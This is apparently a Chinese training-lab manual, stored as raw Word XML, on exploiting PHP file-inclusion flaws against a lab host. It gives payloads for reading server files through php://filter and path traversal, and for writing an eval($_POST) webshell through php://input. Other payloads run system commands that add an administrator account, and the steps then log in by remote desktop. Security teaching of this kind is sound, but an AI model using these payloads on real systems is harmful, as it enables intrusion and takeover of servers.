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78B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B" w:rsidP="0099378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t>文件包含PHP封装协议之读取文件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学会使用文件包含PHP封装协议读取文件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火狐浏览器</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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hackbar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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插件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客户机一台（Windows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2003）服务器一台（Windows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第一步：访问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http://www.any.com/FI/PHP_FI.php?filename=LFI.txt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B417280" wp14:editId="68D24C46">
            <wp:extent cx="5638800" cy="1898490"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985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第二步：通过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php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封装协议读取当前目录下的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phpinfo.php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文件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http://www.any.com/FI/PHP_FI.php?filename=php://filter/read/resource=phpinfo.php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66C506F9" wp14:editId="2FA96DBA">
            <wp:extent cx="5048250" cy="3027932"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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2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第三步：通过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php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封装协议读取当前目录下的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phpinfo.php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文件并进行base64编码（编码后，便不会被解析）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B" w:rsidP="0099378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http://www.any.com/FI/PHP_FI.php?filename=php://filter/read=convert.base64-encode/resource=phpinfo.php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E3484C" wp14:editId="57594946">
            <wp:extent cx="5695950" cy="1847026"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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39" cy="18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第四步：在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hackbar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下进行base64解码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B" w:rsidP="0099378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选中字符串-Encoding-Base64</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Decode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175CEF14" wp14:editId="634C9447">
            <wp:extent cx="5495925" cy="2027730"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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0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解码后结果如下：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0BE1429C" wp14:editId="5BC513D7">
            <wp:extent cx="4543425" cy="1250358"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985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25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第五步：读取其他文件，如C盘根目录下的boot.ini文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B" w:rsidP="0099378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http://www.any.com/FI/PHP_FI.php?filename=php://filter/read/resource=</w:t>
      </w:r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..</w:t>
      </w:r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>/../../../../boot.ini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970FA6" wp14:editId="68402666">
            <wp:extent cx="5349865" cy="1724025"/>
            <wp:effectExtent l="0" t="0" r="381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6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实验完毕，关闭所有界面及虚拟机。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B" w:rsidP="0099378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lastRenderedPageBreak/>
        <w:t>文件包含PHP封装协议之读写文件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学会使用文件包含PHP封装协议写文件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火狐浏览器浏览器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客户机一台（操作系统为Windows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2003）服务器一台（操作系统为Windows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99378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B" w:rsidP="0099378B">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7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1、访问</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋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http://www.any.com/FI/PHP_FI.php?filename=LFI.txt</w:t>
      </w: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，网页显示是文件包含漏洞。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000E01C2" wp14:editId="346615C4">
            <wp:extent cx="5467350" cy="1358900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="图片 2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2、双击桌面的【实验工具】文件夹，找到【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】，双击打开。选择【OK】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5DD313" wp14:editId="69776354">
            <wp:extent cx="5067300" cy="1123950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="图片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选择【I Accept】。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42A8F25" wp14:editId="0FC23B10">
            <wp:extent cx="3448050" cy="1343025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="19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点击【Proxy】—【Options】，使得Proxy Listeners如下图所示。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9608644" wp14:editId="770BB40B">
            <wp:extent cx="5762625" cy="2800149"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="18" name="图片 1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给火狐浏览器设置代理，点击网页右上角，选择【选项】。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0705EE" wp14:editId="037B3F93">
            <wp:extent cx="5346061" cy="3638550"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="17" name="图片 1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1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【高级】—【网络】—【设置】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A42A227" wp14:editId="59536B0A">
            <wp:extent cx="5314950" cy="3117363"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="16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选择【手动配置代理】，输入HTTP代理127.0.0.1，端口8080，清空不使用代理下的文本框中的内容，点击【确定】。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3E334D" wp14:editId="1D42F48E">
            <wp:extent cx="3138433" cy="3676650"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="15" name="图片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33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3、浏览器访问http://www.any.com/FI/PHP_FI.php?filename=php://input，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自动抓包。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CACAE80" wp14:editId="77AF1FD7">
            <wp:extent cx="6172200" cy="1306210"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="14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在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中的【Proxy】—【Intercept】—【Raw】下的文本框末提交数据&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 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fputs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(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fopen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('shell.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php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','w'),'&lt;?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php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 xml:space="preserve"> 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eval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($_POST[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cmd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])?&gt;');?&gt;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6575EA" wp14:editId="136960C3">
            <wp:extent cx="5962650" cy="2550142"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="13" name="图片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中点击【Forward】。浏览器变为下图。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4CB1C8A5" wp14:editId="5B6B376F">
            <wp:extent cx="6248400" cy="1537564"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="12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53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4、双击桌面的【实验工具】文件夹，打开【中国菜刀】文件夹，找到【中国菜刀.exe】双击打开。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空白处右击【添加】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3B3A80D4" wp14:editId="4E6D273F">
            <wp:extent cx="5934075" cy="1741810"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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在地址后的文本框添加网址</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://www.any.com/FI/shell.php，地址框后的密码文本框填写</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。点击【添加】。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877ABF" wp14:editId="047CC995">
            <wp:extent cx="4467225" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="10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双击下图红框中的文本即可运行。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424E0496" wp14:editId="4612D5D1">
            <wp:extent cx="5800725" cy="1304840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9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3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5、执行结果如下。发现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shell.php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已经写入。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BA19F45" wp14:editId="62680CEE">
            <wp:extent cx="5686425" cy="1477076"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="8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47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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B" w:rsidP="0099378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44"/>
          <w:szCs w:val="4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44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>文件包含PHP封装协议之命令执行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学会命令执行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浏览器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1、访问http://www.any.com/FI/PHP_FI.php?filename=LFI.txt，网页显示是文件包含漏洞。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4CC4F1C2" wp14:editId="3A7B7D83">
            <wp:extent cx="5124450" cy="1375848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="图片 3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7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2、给火狐浏览器设置代理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点击页面右上方，选择【选项】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2E8AE2DB" wp14:editId="212DC45A">
            <wp:extent cx="4791075" cy="3297966"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="图片 3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9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【高级】—【网络】—【设置】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73D26D89" wp14:editId="6AC10D7D">
            <wp:extent cx="4924425" cy="3393632"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="图片 3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选择【手动配置代理】，输入HTTP代理127.0.0.1，端口8080，清空不使用代理下方的文本框，点击【确定】。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B2F63D5" wp14:editId="341599AD">
            <wp:extent cx="3032312" cy="3543300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34" name="图片 3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12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3、双击【实验工具】文件夹，双击【Burp】打开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burpsuite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3BB55DA3" wp14:editId="37D5FD3F">
            <wp:extent cx="5057775" cy="1133475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="33" name="图片 3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27613B38" wp14:editId="5829AB4F">
            <wp:extent cx="3409950" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="图片 3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刷新浏览器界面，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burpsuite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自动进行抓包。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点击【Proxy】，在【Intercept】界面下的【Raw】文本框中作如下修改：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filename处改为filename=PHP://input。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同时代码最后加入语句&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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 xml:space="preserve"> system('net user');?&gt;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改完后右键单击空白处，选择【Send to Repeater】。如下图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9DD8FA" wp14:editId="2F99E283">
            <wp:extent cx="4981575" cy="1792096"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="图片 31" descr="文件包含-命令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文件包含-命令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02" cy="179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点击【Repeater】，点击【Go】按钮。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右侧的Response下的文本框会显示net user的数据。如下图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3D938073" wp14:editId="5EB392D8">
            <wp:extent cx="5488287" cy="3170346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="图片 30" descr="文件包含-命令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文件包含-命令-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03" cy="31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4、添加用户。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点击【Proxy】，在【Intercept】界面下的【Raw】文本框中代码最后加入语句&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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 xml:space="preserve"> system('net user a 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a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 xml:space="preserve"> /add');?&gt;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改完后右键单击空白处，选择【Send to Repeater】。如下图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1544DB" wp14:editId="0CFF5DFA">
            <wp:extent cx="5419725" cy="2055247"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="29" name="图片 29" descr="文件包含-命令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文件包含-命令-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73" cy="205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结果如下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3BC5002F" wp14:editId="0FA4E60A">
            <wp:extent cx="6238875" cy="2598107"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="图片 28" descr="文件包含-命令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文件包含-命令-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59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5、添加为管理员。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可以直接在【Repeater】页面修改，语句&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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 xml:space="preserve"> system('net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> administrators a /add');?&gt;，然后点击【Go】。结果如下图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19D4BD" wp14:editId="2E033EF6">
            <wp:extent cx="6267450" cy="2927860"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="27" name="图片 27" descr="文件包含-命令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文件包含-命令-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6、远程桌面连接。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点击【开始】，选择【命令提示符】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4D933736" wp14:editId="23B9F646">
            <wp:extent cx="2540424" cy="3086100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="图片 26" descr="文件包含-命令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文件包含-命令-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424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在命令框里输入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mstsc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，点击回车。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3029A53C" wp14:editId="48B4C56A">
            <wp:extent cx="4600575" cy="1137574"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="25" name="图片 25" descr="文件包含-命令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文件包含-命令-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3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lastRenderedPageBreak/>
        <w:t>在计算机处输入www.any.com，点击【选项】。将用户名改为a，密码输入a。点击【连接】。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A064C72" wp14:editId="3EAFA28E">
            <wp:extent cx="2946439" cy="3190875"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="24" name="图片 24" descr="文件包含-命令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文件包含-命令-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3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点击【开始】，选择【命令提示符】。输入命令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whoami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，结果如下图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72FC0610" wp14:editId="498183E8">
            <wp:extent cx="4728210" cy="1390650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="图片 23" descr="文件包含-命令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文件包含-命令-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7、实验结束，关闭所有程序及虚拟机。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B" w:rsidP="0099378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lastRenderedPageBreak/>
        <w:t>文件包含漏洞(文件包含file封装协议之读取文件)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学会使用文件包含PHP封装协议命令执行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火狐浏览器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99378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B" w:rsidP="0099378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服务器一台（操作系统为Windows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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B" w:rsidP="0099378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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注意：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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>需要将实验中的"www.any.com"替换为“127.0.0.1”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B" w:rsidP="0099378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99378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B" w:rsidP="0099378B">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7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1、使用浏览器打开链接。</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋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http://www.any.com/FI/PHP_FI.php?filename=file://c:/boot.ini</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099378B" w:rsidRPr="008E0FBB" w:rsidRDefault="0099378B" w:rsidP="0099378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08AE2AEF" wp14:editId="1CB1C986">
            <wp:extent cx="6195845" cy="792546"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="39" name="图片 39" descr="http://192.168.29.251/Public/course/5995cef501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192.168.29.251/Public/course/5995cef501a7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038" cy="7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99378B" w:rsidP="0099378B">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:after="100" w:afterAutospacing="1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2、实验完毕，关闭虚拟机和所有窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00377BD1" w:rsidRPr="008E0FBB" w:rsidRDefault="00377BD1">
      <w:pPr>
        <w:widowControl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color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00377BD1" w:rsidRPr="008E0FBB" w:rsidRDefault="00377BD1" w:rsidP="00377BD1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lastRenderedPageBreak/>
        <w:t>文件包含漏洞(本地包含配合文件上传)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学会本地包含配合文件上传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火狐浏览器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客户机一台（操作系统为Windows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2003）服务器一台（操作系统为Windows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Server</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FB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 </w:t>
      </w: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2003）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1、访问http://www.any.com/FI/PHP_FI.php?filename=RFI.txt网页显示是远程文件包含漏洞。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6B8CE415" wp14:editId="1716E1A2">
            <wp:extent cx="5324475" cy="1249250"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="50" name="图片 50" descr="文件上传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文件上传-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lastRenderedPageBreak/>
        <w:t>2、浏览网址</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">http://www.any.com/fileupload/fileupload_js.php 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63DABBD2" wp14:editId="59645B6D">
            <wp:extent cx="5514975" cy="1553248"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="49" name="图片 49" descr="文件上传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文件上传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5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点击【浏览】，选择【桌面】—【实验工具】—【1.jpg】，点击【打开】。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7A145343" wp14:editId="78CB3C67">
            <wp:extent cx="5457825" cy="2956582"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="48" name="图片 48" descr="文件上传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文件上传-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5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点击【上传】。结果如下图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27D9406B" wp14:editId="54890C3B">
            <wp:extent cx="5334000" cy="1500567"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="47" name="图片 47" descr="文件上传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文件上传-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文件1.jpg的内容如下图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28A71897" wp14:editId="2D671493">
            <wp:extent cx="4362450" cy="561975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="46" name="图片 46" descr="http://192.168.29.251/Public/course/584e1e345b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192.168.29.251/Public/course/584e1e345bac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Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3、浏览器浏览网址</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://www.any.com/FI/PHP_FI.php?filename=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/fileupload/uploads/1.jpg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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="668D1C53" wp14:editId="4E847C96">
            <wp:extent cx="5876925" cy="1552900"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="45" name="图片 45" descr="文件上传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文件上传-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4、</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击桌面的【实验工具】文件夹，打开【中国菜刀】文件夹。找到【中国菜刀.exe】并双击打开。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空白处单击，选择【添加】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4BAC5790" wp14:editId="2DA81DAF">
            <wp:extent cx="5391150" cy="1643643"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="44" name="图片 44" descr="文件上传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文件上传-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Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>输入地址</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://www.any.com/FI/shell.php，地址后的密码填写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cmd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。点击【添加】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5878B68" wp14:editId="5BFBDD89">
            <wp:extent cx="3152775" cy="1622661"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43" name="图片 43" descr="文件上传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文件上传-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2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双击下图红框内文本即可运行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6EB8EB" wp14:editId="7AB8FBA4">
            <wp:extent cx="5486400" cy="1190760"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="42" name="图片 42" descr="文件上传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文件上传-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实验结果如下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59AAE7A" wp14:editId="3A244760">
            <wp:extent cx="5162550" cy="1331257"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="41" name="图片 41" descr="文件上传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文件上传-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5、实验结束，关闭所有程序和虚拟机。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00377BD1" w:rsidRPr="008E0FBB" w:rsidRDefault="00377BD1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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00377BD1" w:rsidRPr="008E0FBB" w:rsidRDefault="00377BD1" w:rsidP="00377BD1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lastRenderedPageBreak/>
        <w:t>本地文件包含之读取敏感文件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了解本地文件包含漏洞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浏览器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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00377BD1" w:rsidRPr="008E0FBB" w:rsidRDefault="00377BD1" w:rsidP="00377BD1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第一步：访问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http://www.any.com/FI/PHP_FI.php?filename=LFI.txt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网页显示是文件包含漏洞。</w:t>
      </w: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br/>
        <w:t>第二步：访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00377BD1" w:rsidRPr="008E0FBB" w:rsidRDefault="00377BD1" w:rsidP="00377B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http://www.any.com/FI/PHP_FI.php?filename=../../boot.ini</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00377BD1" w:rsidRPr="008E0FBB" w:rsidRDefault="00377BD1" w:rsidP="00377BD1">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体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可以查看c:/boot.ini的信息,确认有本地文件包含漏洞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D30B8A" wp14:editId="676E628E">
            <wp:extent cx="6158436" cy="3076575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54" name="图片 54" descr="http://192.168.29.251/Public/course/d78ffa30-fcc2-4d82-9327-e81a15e02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192.168.29.251/Public/course/d78ffa30-fcc2-4d82-9327-e81a15e02e1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36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FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>第三步：尝试访问其他敏感信息，比如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httpd.conf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br/>
        <w:t>访问：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00377BD1" w:rsidRPr="008E0FBB" w:rsidRDefault="00377BD1" w:rsidP="00377B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http://www.any.com/FI/PHP_FI.php?filename=</w:t>
      </w:r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..</w:t>
      </w:r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>/../program</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>files/phpstudy/apache/conf/httpd.conf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可以访问</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w: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10C7CEFC" wp14:editId="5C5C5484">
            <wp:extent cx="5899189" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="53" name="图片 53" descr="http://192.168.29.251/Public/course/54920f58-be3d-45b8-8eb2-bab472782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192.168.29.251/Public/course/54920f58-be3d-45b8-8eb2-bab472782ced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2" cy="296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FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>第三步：尝试访问其他常见的路径，比如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ligthttpd.conf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br/>
        <w:t>访问：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00377BD1" w:rsidRPr="008E0FBB" w:rsidRDefault="00377BD1" w:rsidP="00377B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lastRenderedPageBreak/>
        <w:t>http://www.any.com/FI/PHP_FI.php?filename=</w:t>
      </w:r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..</w:t>
      </w:r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>/../program</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>files/phpstudy/lighttpd/conf/lighttpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00377BD1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377BD1" w:rsidP="00377BD1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D2323EB" wp14:editId="2825D1A7">
            <wp:extent cx="5130402" cy="2562995"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="52" name="图片 52" descr="http://192.168.29.251/Public/course/bb48ac8f-c571-4274-934a-67e5a91600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192.168.29.251/Public/course/bb48ac8f-c571-4274-934a-67e5a91600b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51" cy="256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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E0FBB" w:rsidRPr="008E0FBB" w:rsidRDefault="008E0FBB" w:rsidP="008E0FB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仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54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lastRenderedPageBreak/>
        <w:t>本地文件包含之包含日志获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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学会包含日志获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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浏览器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仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
